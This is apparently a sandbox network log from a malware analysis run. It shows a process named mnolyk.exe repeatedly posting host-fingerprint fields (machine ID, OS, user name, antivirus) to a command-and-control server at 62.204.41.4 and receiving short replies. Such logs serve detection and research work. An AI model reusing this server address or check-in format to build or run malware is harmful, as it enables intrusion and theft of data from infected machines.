Feb 7, 2023 20:02:39.366200924 CET	522	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:39.429116011 CET	522	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
375	192.168.2.6	50099	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:39.663651943 CET	523	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:39.726768970 CET	523	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
376	192.168.2.6	50100	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:39.901405096 CET	524	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:39.964401960 CET	524	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
377	192.168.2.6	50101	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:40.156172991 CET	525	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:40.222395897 CET	525	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
378	192.168.2.6	50102	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:40.427299976 CET	526	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:40.495271921 CET	526	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
379	192.168.2.6	50103	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:40.685700893 CET	527	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:40.756908894 CET	527	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.6	49756	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:00.094396114 CET	144	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:00.159466028 CET	144	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
380	192.168.2.6	50104	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:40.952137947 CET	528	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:41.018984079 CET	528	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
381	192.168.2.6	50105	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:41.198188066 CET	529	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:41.265789032 CET	529	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
382	192.168.2.6	50106	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:41.451184034 CET	530	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:41.514235973 CET	530	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
383	192.168.2.6	50107	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:41.686559916 CET	531	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:41.748126984 CET	531	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
384	192.168.2.6	50108	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:41.932132959 CET	532	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:41.996509075 CET	532	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
385	192.168.2.6	50109	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:42.172518969 CET	533	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:42.235604048 CET	533	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
386	192.168.2.6	50110	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:42.417577982 CET	534	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:42.481040955 CET	534	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
387	192.168.2.6	50111	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:42.651134014 CET	535	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:42.713891029 CET	535	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
388	192.168.2.6	50112	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:42.895839930 CET	536	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:42.960836887 CET	536	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
389	192.168.2.6	50113	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:43.134587049 CET	536	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:43.199352026 CET	537	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.6	49757	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:00.338640928 CET	145	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:00.400506020 CET	145	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
390	192.168.2.6	50114	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:43.402147055 CET	538	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:43.466646910 CET	538	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
391	192.168.2.6	50115	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:43.638524055 CET	539	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:43.702280045 CET	539	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
392	192.168.2.6	50116	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:43.899560928 CET	540	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:43.965069056 CET	540	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
393	192.168.2.6	50117	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:44.156964064 CET	541	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
